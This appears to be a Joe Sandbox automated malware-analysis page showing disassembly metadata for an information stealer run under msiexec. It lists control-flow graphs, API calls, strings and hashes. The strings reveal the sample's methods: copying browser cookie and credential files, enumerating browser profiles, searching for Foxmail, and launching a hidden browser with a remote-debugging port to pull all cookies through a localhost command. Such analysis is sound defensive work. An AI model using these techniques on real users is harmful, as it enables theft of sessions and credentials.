                                                                                                                                                                                                          control_flow_graph 985 214d7890-214d78bd CreateToolhelp32Snapshot 986 214d78bf-214d78d9 Process32FirstW 985->986 987 214d78e2-214d78ea 985->987 988 214d78db-214d78dc CloseHandle 986->988 989 214d78f0-214d790b 986->989 988->987 990 214d790d-214d790f 989->990 991 214d7911-214d791a 989->991 992 214d792f-214d7943 call 214d3970 990->992 993 214d7920-214d7929 991->993 997 214d7949 992->997 998 214d7945-214d7947 992->998 993->993 994 214d792b-214d792d 993->994 994->992 999 214d794b-214d7963 997->999 998->999 1000 214d7965 999->1000 1001 214d7967 1000->1001 1002 214d7976-214d797c 1000->1002 1003 214d7969-214d796b 1001->1003 1004 214d797e-214d7987 1002->1004 1005 214d7989-214d798f 1002->1005 1006 214d796d-214d796f 1003->1006 1007 214d7995-214d799b 1003->1007 1004->1000 1005->1003 1010 214d7991-214d7993 1006->1010 1011 214d7971-214d7974 1006->1011 1008 214d799d-214d79a2 call 214d4160 1007->1008 1009 214d79a7-214d79a9 1007->1009 1008->1009 1013 214d7a0d 1009->1013 1014 214d79ab-214d79bb 1009->1014 1010->1007 1011->1007 1015 214d7a10-214d7a26 Process32NextW 1013->1015 1016 214d79bd 1014->1016 1017 214d79cf 1014->1017 1015->989 1018 214d7a2c-214d7a3b CloseHandle 1015->1018 1019 214d79c0-214d79c2 1016->1019 1020 214d79d1-214d79f5 FindWindowExA GetWindowThreadProcessId 1017->1020 1021 214d79cb-214d79cd 1019->1021 1022 214d79c4-214d79c9 1019->1022 1023 214d79f7-214d79fa ShowWindow 1020->1023 1024 214d7a00-214d7a02 1020->1024 1021->1013 1021->1017 1022->1019 1022->1021 1023->1024 1024->1020 1025 214d7a04-214d7a0b 1024->1025 1025->1015
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 214D78AF
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 214D78D1
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 214D78DC
                                                                                                                                                                                                          • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 214D79D8
                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 214D79EC
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 214D79FA
                                                                                                                                                                                                          • Process32NextW.KERNEL32(?,0000022C), ref: 214D7A1B
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 214D7A2D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CloseHandleProcess32$CreateFindFirstNextProcessShowSnapshotThreadToolhelp32
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3779799082-0
                                                                                                                                                                                                          • Opcode ID: 37e464305c51f6f19201729bf3a263e7d77d2bd9dcbcc49149e962ec0c7553b6
                                                                                                                                                                                                          • Instruction ID: ae89bd63c3d6aa85944a22701f9814765a3df24f0e8c71a8b09bf9c70c3d2b11
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37e464305c51f6f19201729bf3a263e7d77d2bd9dcbcc49149e962ec0c7553b6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E51A073E402299BDF118FA4C894FAEBBB5EB4671AF204199DD19B7380D7309E01CB91
                                                                                                                                                                                                          Function 21DE10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1026 21de10f1-21de1166 call 21de2c40 * 2 lstrlenW call 21de2c40 lstrcatW lstrlenW 1033 21de1168-21de1172 lstrlenW 1026->1033 1034 21de1177-21de119e lstrlenW FindFirstFileW 1026->1034 1033->1034 1035 21de11a0-21de11a8 1034->1035 1036 21de11e1-21de11e9 1034->1036 1037 21de11aa-21de11c4 call 21de1000 1035->1037 1038 21de11c7-21de11d8 FindNextFileW 1035->1038 1037->1038 1038->1035 1039 21de11da-21de11db FindClose 1038->1039 1039->1036
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21DE1137
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21DE1151
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE115C
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE116D
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE117C
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21DE1193
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 21DE11D0
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 21DE11DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1083526818-0
                                                                                                                                                                                                          • Opcode ID: dee3752bcc52500e8ea4d0f4e8b68ded18d7f7e609b8950268d78a24ba2fc381
                                                                                                                                                                                                          • Instruction ID: 271eb71912ac911165c33256ece57d129a5865eeec433a4d63e78accaa71a75c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dee3752bcc52500e8ea4d0f4e8b68ded18d7f7e609b8950268d78a24ba2fc381
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721E371644319ABD714EA64DC4CF8B7B9CEF84315F040E2EB998D3090EB74D61487A2
                                                                                                                                                                                                          Function 214D1F42 Relevance: 33.7, APIs: 9, Strings: 10, Instructions: 472fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 127 214d1f42-214d1f98 call 214d4330 CreateDirectoryW call 214d4d80 * 2 134 214d1f9c-214d1fa0 127->134 135 214d1f9a 127->135 136 214d1fa4-214d1fb4 CopyFileW 134->136 137 214d1fa2 134->137 135->134 138 214d1fb6-214d1fbb call 214d4160 136->138 139 214d1fc0-214d1fe1 136->139 137->136 138->139 141 214d1ff0-214d2052 call 214d3a70 call 214d67d0 139->141 142 214d1fe3-214d1feb call 214d4160 139->142 150 214d2058-214d205a 141->150 151 214d24f0-214d2514 call 214d38d0 141->151 142->141 152 214d2060-214d2098 call 214d4d80 150->152 157 214d2516-214d251e call 214d4160 151->157 158 214d2523-214d2546 151->158 159 214d209e-214d20cf call 214d4e80 call 214d4cc0 152->159 160 214d2590-214d259a call 214da5c6 152->160 157->158 162 214d2548-214d254d call 214d4160 158->162 163 214d2552-214d256c 158->163 174 214d20db-214d20f9 159->174 175 214d20d1-214d20d6 call 214d4160 159->175 162->163 164 214d256e-214d2573 call 214d4160 163->164 165 214d2578-214d258a 163->165 164->165 177 214d20fb-214d2100 call 214d4160 174->177 178 214d2105-214d214e call 214d4d80 174->178 175->174 177->178 178->160 182 214d2154-214d2173 call 214d4e80 178->182 185 214d217f-214d21c9 call 214d4d80 call 214d4cc0 182->185 186 214d2175-214d217a call 214d4160 182->186 192 214d21cb-214d21d0 call 214d4160 185->192 193 214d21d5-214d227c CreateDirectoryW * 2 call 214d4330 call 214d4d80 * 2 185->193 186->185 192->193 193->160 201 214d2282-214d22b0 call 214d4e80 call 214d4cc0 193->201 206 214d22b4-214d22b8 201->206 207 214d22b2 201->207 208 214d22bc-214d22ce CopyFileW 206->208 209 214d22ba 206->209 207->206 210 214d22da-214d22f4 208->210 211 214d22d0-214d22d5 call 214d4160 208->211 209->208 213 214d22f6-214d22fb call 214d4160 210->213 214 214d2300-214d231d 210->214 211->210 213->214 216 214d232c-214d2356 214->216 217 214d231f-214d2327 call 214d4160 214->217 219 214d2358-214d2360 call 214d4160 216->219 220 214d2365-214d238c CopyFileW 216->220 217->216 219->220 222 214d244e-214d2454 220->222 223 214d2392-214d23e8 call 214d6e60 CreateFileW 220->223 225 214d2456-214d245b call 214d4160 222->225 226 214d2460-214d247d 222->226 231 214d23ea-214d23ff WriteFile CloseHandle 223->231 232 214d2405-214d240b 223->232 225->226 229 214d248c-214d24b6 226->229 230 214d247f-214d2487 call 214d4160 226->230 234 214d24b8-214d24c0 call 214d4160 229->234 235 214d24c5-214d24ea 229->235 230->229 231->232 236 214d240d-214d2416 232->236 237 214d244b 232->237 234->235 235->151 235->152 239 214d2418-214d241b 236->239 240 214d2442-214d2448 call 214da956 236->240 237->222 241 214d258b call 214ddaab 239->241 242 214d2421-214d2426 239->242 240->237 241->160 242->241 245 214d242c-214d2431 242->245 245->241 247 214d2437-214d243a 245->247 247->241 248 214d2440 247->248 248->240
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000000FF,?,00000000), ref: 214D1F5F
                                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 214D1FA8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CopyCreateDirectoryFile
                                                                                                                                                                                                          • String ID: Network$User Data$\Cookies$\Local State$\Local State$\Network\Cookies$\Secure Preferences$\Secure Preferences$invalid vector<T> subscript$-
                                                                                                                                                                                                          • API String ID: 3761107634-3418363220
                                                                                                                                                                                                          • Opcode ID: 4010cf6a9eadb76657c50a60b4b17aa4df3f8cc02326909884b02390aa27af04
                                                                                                                                                                                                          • Instruction ID: 09587f9a975a6cfe29dbc6963d2c873809527ba524b58b055a8a8ce831498810
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4010cf6a9eadb76657c50a60b4b17aa4df3f8cc02326909884b02390aa27af04
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2025872A001199FDF14CFA4CCA4FAEBBB5FF64304F5444A9E809AB250D774AE45CBA1
                                                                                                                                                                                                          Function 21DE12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21DE1434
                                                                                                                                                                                                            • Part of subcall function 21DE10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21DE1137
                                                                                                                                                                                                            • Part of subcall function 21DE10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21DE1151
                                                                                                                                                                                                            • Part of subcall function 21DE10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE115C
                                                                                                                                                                                                            • Part of subcall function 21DE10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE116D
                                                                                                                                                                                                            • Part of subcall function 21DE10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21DE117C
                                                                                                                                                                                                            • Part of subcall function 21DE10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21DE1193
                                                                                                                                                                                                            • Part of subcall function 21DE10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 21DE11D0
                                                                                                                                                                                                            • Part of subcall function 21DE10F1: FindClose.KERNEL32(00000000), ref: 21DE11DB
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 21DE14C5
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 21DE14E0
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 21DE150F
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 21DE1521
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 21DE1547
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 21DE1553
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 21DE1579
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 21DE1585
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 21DE15AB
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 21DE15B7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                                          • Opcode ID: 403a9f6b525123d60196412d0a64fcd628e6a1eea2a394678760329615894d87
                                                                                                                                                                                                          • Instruction ID: f4a56a6da0737c7c4c02e77438207a47152c02051597853a8901ef436c07d367
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 403a9f6b525123d60196412d0a64fcd628e6a1eea2a394678760329615894d87
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E981A171A4036CE9DB20DBA1DC85FEE777DEF84711F00059AF508E7190EAB15A88CBA5
                                                                                                                                                                                                          Function 214D267B Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 337sleepprocesssynchronizationCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 214D76D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 214D7722
                                                                                                                                                                                                            • Part of subcall function 214D76D0: Process32FirstW.KERNEL32(00000000,?), ref: 214D7744
                                                                                                                                                                                                            • Part of subcall function 214D76D0: CloseHandle.KERNEL32(00000000), ref: 214D774F
                                                                                                                                                                                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,?,?,?,?), ref: 214D279E
                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,214F78DE,00000000,?,?,?,?), ref: 214D28D2
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 214D2A9D
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?), ref: 214D2AAB
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 214D2ABA
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 214D2ABF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • {"id":2,"method":"Browser.close"}, xrefs: 214D2A3B
                                                                                                                                                                                                          • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 214D2962
                                                                                                                                                                                                          • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 214D2737
                                                                                                                                                                                                          • localhost, xrefs: 214D296F
                                                                                                                                                                                                          • localhost, xrefs: 214D2A48
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandle$CreateProcess$FirstObjectProcess32SingleSleepSnapshotTerminateToolhelp32Wait
                                                                                                                                                                                                          • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$localhost$localhost${"id":1,"method":"Network.getAllCookies","params":{}}${"id":2,"method":"Browser.close"}
                                                                                                                                                                                                          • API String ID: 3739829977-2677655338
                                                                                                                                                                                                          • Opcode ID: febea5ab533869542489d6e4b05fc9bbec73c5ea5e0cca39d9ed9525524a114e
                                                                                                                                                                                                          • Instruction ID: afda9844ed2b5152467735cbf8e4b4b3da6b116e1a4b254bd13c6e1088f8e2c1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: febea5ab533869542489d6e4b05fc9bbec73c5ea5e0cca39d9ed9525524a114e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBC1B472D0020A9EEF14DBA0C8A4FEEBBB5EF36704F10419DD90DA3291DB755A45CB62
                                                                                                                                                                                                          Function 214D67D0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 277COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 728 214d67d0-214d6849 call 214d4d80 PathFileExistsW 731 214d684b-214d6887 call 214d3970 call 214d6b40 728->731 732 214d6897-214d68b1 call 214d4d80 728->732 746 214d693c 731->746 748 214d688d-214d6892 731->748 738 214d68b3-214d68b9 732->738 739 214d68e2-214d68ec 732->739 741 214d68bb-214d68c0 call 214d4160 738->741 742 214d68c5-214d68dd call 214d3b90 738->742 743 214d68ee-214d68f3 call 214d4160 739->743 744 214d68f8-214d6908 PathFileExistsW 739->744 741->742 742->739 743->744 744->746 747 214d690a-214d6930 call 214d34a0 call 214d6b40 744->747 753 214d6941-214d697a call 214d7d50 call 214d4d80 call 214d6d90 746->753 747->746 761 214d6932-214d6934 747->761 752 214d6937 call 214d4160 748->752 752->746 765 214d697c-214d6982 753->765 766 214d69ab-214d69b1 753->766 761->752 767 214d698e-214d69a6 call 214d3b90 765->767 768 214d6984-214d6989 call 214d4160 765->768 769 214d69bd-214d69d7 766->769 770 214d69b3-214d69b8 call 214d4160 766->770 767->766 768->767 774 214d69d9-214d69de call 214d4160 769->774 775 214d69e3-214d6a01 769->775 770->769 774->775 777 214d6a0d-214d6a21 PathFileExistsW 775->777 778 214d6a03-214d6a08 call 214d4160 775->778 779 214d6ae9-214d6aed 777->779 780 214d6a27-214d6a4f call 214d7d50 call 214d4a00 777->780 778->777 779->753 783 214d6af3-214d6af9 779->783 793 214d6a8c-214d6a92 780->793 794 214d6a51-214d6a55 780->794 785 214d6afb-214d6b00 call 214d4160 783->785 786 214d6b05-214d6b1f 783->786 785->786 789 214d6b2b-214d6b3d 786->789 790 214d6b21-214d6b26 call 214d4160 786->790 790->789 796 214d6a9c-214d6aa1 793->796 797 214d6a94-214d6a97 call 214d6bc0 793->797 794->793 795 214d6a57-214d6a70 794->795 800 214d6a7a-214d6a87 795->800 801 214d6a72-214d6a75 call 214d6bc0 795->801 798 214d6aa9-214d6ab3 796->798 799 214d6aa3 796->799 797->796 804 214d6abf-214d6add 798->804 805 214d6ab5-214d6aba call 214d4160 798->805 803 214d6aa4 call 214d5030 799->803 800->798 807 214d6a89-214d6a8a 800->807 801->800 803->798 804->779 810 214d6adf-214d6ae4 call 214d4160 804->810 805->804 807->803 810->779
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 214D6845
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 214D6904
                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 214D6A19
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                                          • String ID: Default$Default$Profile $User Data\Default$User Data\Profile $\Default
                                                                                                                                                                                                          • API String ID: 1174141254-1565956251
                                                                                                                                                                                                          • Opcode ID: 8e6bbfcddcfb07d3fd086a4dbf2a348ebab0b3ba842e8618683b64aab2ea3b25
                                                                                                                                                                                                          • Instruction ID: f147e8e3d1e14d6b1be4c98c29dea451f2d75ce87953484d85ec6f02c067fbcd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e6bbfcddcfb07d3fd086a4dbf2a348ebab0b3ba842e8618683b64aab2ea3b25
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27A13972D00209AEDF01CFA8D8A4BAEBBB5FF65704F60805DE459E7250D774AA05CBA1
                                                                                                                                                                                                          Function 214D25A0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 157COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • D, xrefs: 214D263C
                                                                                                                                                                                                          • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 214D2962
                                                                                                                                                                                                          • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 214D2737
                                                                                                                                                                                                          • localhost, xrefs: 214D296F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$D$localhost${"id":1,"method":"Network.getAllCookies","params":{}}
                                                                                                                                                                                                          • API String ID: 0-36197314
                                                                                                                                                                                                          • Opcode ID: c52fb2a3a6cd7894b2994aafdbf96bcd1283acba5b9de39f668544e7b6b33365
                                                                                                                                                                                                          • Instruction ID: d33a9a79c9b7b593f053031dd9fde10f519f52573fcc6faf09e5058c963b08f1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c52fb2a3a6cd7894b2994aafdbf96bcd1283acba5b9de39f668544e7b6b33365
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E515872C042599EEF24CFA4CC94FDEBBB5AF25304F104199E90DB3291EB745A88CB61
                                                                                                                                                                                                          Function 214D85D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71networkwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 969 214d85d8-214d85df 970 214d85e1 969->970 971 214d85e3-214d85f8 getaddrinfo 969->971 970->971 972 214d85fa-214d8641 FormatMessageA call 214ddd3f call 214d84c0 971->972 973 214d8642-214d8647 971->973 975 214d8649-214d864f 973->975 976 214d8688-214d8697 FreeAddrInfoW 973->976 978 214d8650-214d8664 socket 975->978 979 214d867e-214d8683 978->979 980 214d8666-214d8676 connect 978->980 979->978 983 214d8685 979->983 982 214d8678-214d867b closesocket 980->982 980->983 982->979 983->976
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • getaddrinfo.WS2_32(?,00000010,?,?), ref: 214D85F0
                                                                                                                                                                                                          • FormatMessageA.KERNEL32(000012FF,00000000,00000000,00000400,214FC4F0,00000400,00000000,?,00000010,?,?), ref: 214D8613
                                                                                                                                                                                                          • socket.WS2_32(?,?,?), ref: 214D8659
                                                                                                                                                                                                          • connect.WS2_32(00000000,?,?), ref: 214D866D
                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 214D8679
                                                                                                                                                                                                          • FreeAddrInfoW.WS2_32(?), ref: 214D8689
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
